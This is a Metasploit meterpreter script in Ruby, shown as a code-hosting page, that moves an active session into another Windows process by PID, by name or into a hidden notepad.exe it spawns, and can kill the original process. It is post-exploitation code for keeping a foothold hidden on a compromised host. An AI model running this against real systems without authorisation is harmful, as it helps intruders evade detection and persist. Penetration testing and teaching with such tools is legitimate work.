97 lines
2.3 KiB
Ruby
97 lines
2.3 KiB
Ruby
##
|
|
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
|
|
# If you'd like to improve this script, please try to port it as a post
|
|
# module instead. Thank you.
|
|
##
|
|
|
|
|
|
|
|
#
|
|
# Simple example script that migrates to a specific process by name.
|
|
# This is meant as an illustration.
|
|
#
|
|
|
|
|
|
spawn = false
|
|
kill = false
|
|
target_pid = nil
|
|
target_name = nil
|
|
|
|
opts = Rex::Parser::Arguments.new(
|
|
"-h" => [ false, "Help menu." ],
|
|
"-f" => [ false, "Launch a process and migrate into the new process"],
|
|
"-p" => [ true , "PID to migrate to."],
|
|
"-k" => [ false, "Kill original process."],
|
|
"-n" => [ true, "Migrate into the first process with this executable name (explorer.exe)" ]
|
|
)
|
|
|
|
opts.parse(args) { |opt, idx, val|
|
|
case opt
|
|
when "-f"
|
|
spawn = true
|
|
when "-k"
|
|
kill = true
|
|
when "-p"
|
|
target_pid = val.to_i
|
|
when "-n"
|
|
target_name = val.to_s
|
|
when "-h"
|
|
print_line(opts.usage)
|
|
raise Rex::Script::Completed
|
|
else
|
|
print_line(opts.usage)
|
|
raise Rex::Script::Completed
|
|
end
|
|
}
|
|
|
|
# Creates a temp notepad.exe to migrate to depending the architecture.
|
|
def create_temp_proc()
|
|
# Use the system path for executable to run
|
|
cmd = "notepad.exe"
|
|
# run hidden
|
|
proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
|
|
return proc.pid
|
|
end
|
|
|
|
# In case no option is provided show help
|
|
if args.length == 0
|
|
print_line(opts.usage)
|
|
raise Rex::Script::Completed
|
|
end
|
|
|
|
### Main ###
|
|
|
|
if client.platform == 'windows'
|
|
server = client.sys.process.open
|
|
original_pid = server.pid
|
|
print_status("Current server process: #{server.name} (#{server.pid})")
|
|
|
|
if spawn
|
|
print_status("Spawning notepad.exe process to migrate to")
|
|
target_pid = create_temp_proc
|
|
end
|
|
|
|
if target_name and not target_pid
|
|
target_pid = client.sys.process[target_name]
|
|
if not target_pid
|
|
print_status("Could not identify the process ID for #{target_name}")
|
|
raise Rex::Script::Completed
|
|
end
|
|
end
|
|
|
|
begin
|
|
print_good("Migrating to #{target_pid}")
|
|
client.core.migrate(target_pid)
|
|
print_good("Successfully migrated to process #{}")
|
|
rescue ::Exception => e
|
|
print_error("Could not migrate in to process.")
|
|
print_error(e)
|
|
end
|
|
|
|
if kill
|
|
print_status("Killing original process with PID #{original_pid}")
|
|
client.sys.process.kill(original_pid)
|
|
print_good("Successfully killed process with PID #{original_pid}")
|
|
end
|
|
end
|